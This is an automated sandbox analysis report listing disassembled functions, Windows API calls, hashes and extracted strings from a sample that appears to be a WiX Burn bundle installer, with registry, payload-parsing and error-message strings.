                                                            • Opcode Fuzzy Hash: 2054689ec431f74f6f86c3ba0ccb3acc1b8724260aa6a58ec93e95e5e9087eba
                                                            • Instruction Fuzzy Hash: 8CF0A733A45236378B2136995C05E8B7E58FF017B07114325BD38FA2D0FA65C91085E1
                                                            Function 008A3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008A3D6E
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A3D78
                                                            • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 008A3D85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: d4f7376444aaf9a6e97819dce579f85fd6cefba396674966290edcbc0e8a9be4
                                                            • Instruction ID: 24cc1861c9442620a8d7596e22fc1bc2660f32c81773ee0707d3af3936f16501
                                                            • Opcode Fuzzy Hash: d4f7376444aaf9a6e97819dce579f85fd6cefba396674966290edcbc0e8a9be4
                                                            • Instruction Fuzzy Hash: 8131B4749112289BCB61EF69D989789BBF8FF08710F5042EAE40CA6251E7709F818F45
                                                            Function 008AA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                            • Instruction ID: b090209901b9f69c42070ffbf4f0f79e032d3d7576834d4b582d9e4c96b1a146
                                                            • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                            • Instruction Fuzzy Hash: E8021B71E002199FEF18CFA9C8806AEBBF1FF89314F258169D919E7740D735A941CB91
                                                            Function 008B3A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008B3A8E,?), ref: 008B3C62
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008B3AB2
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008B3AC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckCloseInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 2114926846-0
                                                            • Opcode ID: 5474bb15449fb4d4ad93840888b0225ee9e515d119b27cf46e69d2d5cea739d0
                                                            • Instruction ID: bb4478e1190d91db8869bc47e867cb09313d4f0daee21e52f7f5f7f63457fd58
                                                            • Opcode Fuzzy Hash: 5474bb15449fb4d4ad93840888b0225ee9e515d119b27cf46e69d2d5cea739d0
                                                            • Instruction Fuzzy Hash: 57110C7190061EAFDB10EFA4CC85BEFB7B8FF14300F645529A541E6251E7709A44CB55
                                                            Function 008B4440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                            • FindClose.KERNEL32(00000000), ref: 008B4487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 8aa497cc605e5c52fd36da492b875e826e24fb554e5d2cf79b0bf747804c7e2b
                                                            • Instruction ID: b8a6da46ac56c06397f3eaf52ac42fa888a7a56b4bab630f5b73390d10bfca1a
                                                            • Opcode Fuzzy Hash: 8aa497cc605e5c52fd36da492b875e826e24fb554e5d2cf79b0bf747804c7e2b
                                                            • Instruction Fuzzy Hash: 3E01F93160120C6BCB10EF69ED89EABB7ACFBC5315F000165F914D3241D6749D598B58
                                                            Function 008A2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$comres.dll
                                                            • API String ID: 0-3030269839
                                                            • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                            • Instruction ID: ce002aa06281a1d2e39615d6d98154866878aa9718f1833b7d200cb9bcd41be6
                                                            • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                            • Instruction Fuzzy Hash: CE517A60200B0C5BFB388B6C85967BF2795FB17354F180919E943DBE93D609EE818356
                                                            Function 008AEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008AEE77,?,?,00000008,?,?,008AEB17,00000000), ref: 008AF0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 0cdf3df4c72ace68a3533852d09ab1b834b2eb32cae340ad4b917f0be073d577
                                                            • Instruction ID: 11cb98463ccd1955acc5be698aa3edc760ba55d8a7ceb34c85e4f3160b16092f
                                                            • Opcode Fuzzy Hash: 0cdf3df4c72ace68a3533852d09ab1b834b2eb32cae340ad4b917f0be073d577
                                                            • Instruction Fuzzy Hash: 31B16D31210609DFE715CF28C48AB657BE0FF46364F2586A8E999CF6A2C735E991CB40
                                                            Function 0089EC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0089EC20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: fa606d5f0614ad00a491928ca9b78daf005d0858fd701957231c66d6f739a11b
                                                            • Instruction ID: c3ea6b94a00d60553271041b1e3e00b94c11d00a8c99654a02d7f30b295fb1da
                                                            • Opcode Fuzzy Hash: fa606d5f0614ad00a491928ca9b78daf005d0858fd701957231c66d6f739a11b
                                                            • Instruction Fuzzy Hash: 81518BB1D12609CBEF28DF59D8857AABBF4FB48304F28826AD405EB290E3759D00CF51
                                                            Function 0089E9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0089E131), ref: 0089E9E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: bb1d20d7df427f42d438b1c1243cbf864611f93e29bc3c0a941e22540ffdb661
                                                            • Instruction ID: 02bd553614280d062fa51397eedcb3f1b7999704b76047a57a77c5f06a0a4112
                                                            • Opcode Fuzzy Hash: bb1d20d7df427f42d438b1c1243cbf864611f93e29bc3c0a941e22540ffdb661
                                                            • Instruction Fuzzy Hash:
                                                            Function 0089FB89 Relevance: .5, Instructions: 481COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbd40b1e8373262c87754e0145e7c329774632329fdf8b5484710b376a492fe0
                                                            • Instruction ID: db57fe3edf3b17de2f281fce51389c7bed1ce2b28f1237d2731f740cfe2ce795
                                                            • Opcode Fuzzy Hash: cbd40b1e8373262c87754e0145e7c329774632329fdf8b5484710b376a492fe0
                                                            • Instruction Fuzzy Hash: 2402A2321095A20BDF2D4A39847007B7BA1FA833B171E47ADD8B6CF5D7DE20E964D660
                                                            Function 008A0B6F Relevance: .4, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                            • Instruction ID: e85ca1d82afb1f79c159b3af735b807e5ac14e619173b0a7038e608ae5d5322e
                                                            • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                            • Instruction Fuzzy Hash: 5EC166331051A20BFF6D4639847417EFBA1EA933B131A179DD4B2CB9D5EE209535EA20
                                                            Function 008A07AA Relevance: .3, Instructions: 347COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                            • Instruction ID: 42fb76554b3bc42785bdd30d7fec5f5fac31583b7ea21816ae7e194f0845780a
                                                            • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                            • Instruction Fuzzy Hash: 9DC160331051A20AFF2D4639847407FBBA1AE933B131E179DD4F2CB9D6EE249579DA20
                                                            Function 008A03D5 Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                            • Instruction ID: b3af4f71c4f4d580c54763553f09567bb4210eed12d85ca025ff3c00369ebae7
                                                            • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                            • Instruction Fuzzy Hash: EEC170321051A24BFF6D8639847407EBBA1BA933B171E179DD4F2CB9D5EE209538DE20
                                                            Function 008A001D Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                            • Instruction ID: 5a444adee75ec17ff7e14104dd36af70f650f47eb090e1b55257aa01585674c7
                                                            • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                            • Instruction Fuzzy Hash: 57B183321091A24BFF2E4239847457FBBE1FA933B171A179DD4B2CB9C5EE209535DA20
                                                            Function 008A2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f09e27e0eeda23b70682a982cfc1457c85862115edde3d88bb9384beb2145ed4
                                                            • Instruction ID: cdbf318b1b79524e71f53bd804e26ef20deddb9a77d15cf7a2f63f29d3a63380
                                                            • Opcode Fuzzy Hash: f09e27e0eeda23b70682a982cfc1457c85862115edde3d88bb9384beb2145ed4
                                                            • Instruction Fuzzy Hash: B4614971600B085EFB389A2C8895BBE63A5FF43704F14491AF942DFE82EA15DE81C356
                                                            Function 0087FF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00880592
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                            • API String ID: 3535843008-2755343042
                                                            • Opcode ID: 69494649463b55edfb6d1a7dddddd221cf44bf459d3091c62d53ba35e87bc434
                                                            • Instruction ID: 099675ad7e8acdec0cc6f096fa557ba3a7de817dcf02889139720c8f4634c677
                                                            • Opcode Fuzzy Hash: 69494649463b55edfb6d1a7dddddd221cf44bf459d3091c62d53ba35e87bc434
                                                            • Instruction Fuzzy Hash: 09F1FF31A8062AFBCF626664CD46FAA7675FB00764F050124F900FA352CB75ED68EF91
                                                            Function 0087CDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0087545D,00000000,008BCA9C,00875445,00000000), ref: 0087CEF3
                                                            Strings
                                                            • Failed to get @Hash., xrefs: 0087D1E3
                                                            • Failed to hex decode the Payload/@Hash., xrefs: 0087D1DC
                                                            • Packaging, xrefs: 0087CEC6
                                                            • Hash, xrefs: 0087D0B7
                                                            • SourcePath, xrefs: 0087CFB0
                                                            • LayoutOnly, xrefs: 0087CF8D
                                                            • Failed to to find container: %ls, xrefs: 0087D186
                                                            • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0087D1B9
                                                            • DownloadUrl, xrefs: 0087CFD9
                                                            • payload.cpp, xrefs: 0087CE3F
                                                            • Failed to get @LayoutOnly., xrefs: 0087D197
                                                            • Failed to hex decode @CertificateRootThumbprint., xrefs: 0087D1C0
                                                            • Container, xrefs: 0087CF4B
                                                            • Failed to get @DownloadUrl., xrefs: 0087D1EA
                                                            • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0087D1B2
                                                            • Failed to parse @FileSize., xrefs: 0087D1A1
                                                            • Failed to allocate memory for payload structs., xrefs: 0087CE49
                                                            • CertificateRootThumbprint, xrefs: 0087D07A
                                                            • Failed to get @FilePath., xrefs: 0087D21A
                                                            • Failed to get @CertificateRootThumbprint., xrefs: 0087D1C7
                                                            • Failed to find catalog., xrefs: 0087D1CE
                                                            • Failed to get next node., xrefs: 0087D228
                                                            • Invalid value for @Packaging: %ls, xrefs: 0087D200
                                                            • Failed to get @Container., xrefs: 0087D18D
                                                            • CertificateRootPublicKeyIdentifier, xrefs: 0087D03D
                                                            • Catalog, xrefs: 0087D0EC
                                                            • Failed to get payload node count., xrefs: 0087CE10
                                                            • Failed to select payload nodes., xrefs: 0087CDEB
                                                            • FilePath, xrefs: 0087CEAB
                                                            • Failed to get @Id., xrefs: 0087D221
                                                            • external, xrefs: 0087CF21
                                                            • Payload, xrefs: 0087CDD8
                                                            • Failed to get @FileSize., xrefs: 0087D1AB
                                                            • Failed to get @Packaging., xrefs: 0087D213
                                                            • embedded, xrefs: 0087CF05
                                                            • Failed to get @Catalog., xrefs: 0087D1D5
                                                            • download, xrefs: 0087CEE5
                                                            • Failed to get @SourcePath., xrefs: 0087D1F1
                                                            • FileSize, xrefs: 0087D002
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCompareProcessString
                                                            • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                            • API String ID: 1171520630-3127305756
                                                            • Opcode ID: ccfd87bbc3e64d1f90e89e4fcf0ff505c6583e29b7631775fd81c22d118bcf0f
                                                            • Instruction ID: 81acd0a0001ba9614eb3b66fde5af4b6c77f9aed8a5f042f31983f091025fb3a
                                                            • Opcode Fuzzy Hash: ccfd87bbc3e64d1f90e89e4fcf0ff505c6583e29b7631775fd81c22d118bcf0f
                                                            • Instruction Fuzzy Hash: 06C1C272D4072AFBCB119A98CC01EADBB74FF04720F258165FA29F7396C764EE419690
                                                            Function 00878476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00875445,?,00000000,80070490,?,?,?,?,?,?,?,?,0089C1BF,?,00875445,?), ref: 008784A7
                                                            • LeaveCriticalSection.KERNEL32(00875445,?,?,?,?,?,?,?,?,0089C1BF,?,00875445,?,00875445,00875445,Chain), ref: 00878804
                                                            Strings
                                                            • Type, xrefs: 008785A3
                                                            • Variable, xrefs: 008784B1
                                                            • Failed to get @Type., xrefs: 00878788
                                                            • Failed to get @Hidden., xrefs: 008787E8
                                                            • Persisted, xrefs: 0087854A
                                                            • Failed to get @Persisted., xrefs: 008787E1
                                                            • Initializing string variable '%ls' to value '%ls', xrefs: 0087861A
                                                            • Value, xrefs: 00878565
                                                            • version, xrefs: 0087862C
                                                            • numeric, xrefs: 008785BC
                                                            • Failed to set variant value., xrefs: 0087878F
                                                            • Invalid value for @Type: %ls, xrefs: 00878778
                                                            • Initializing hidden variable '%ls', xrefs: 00878671
                                                            • Failed to set variant encryption, xrefs: 0087879D
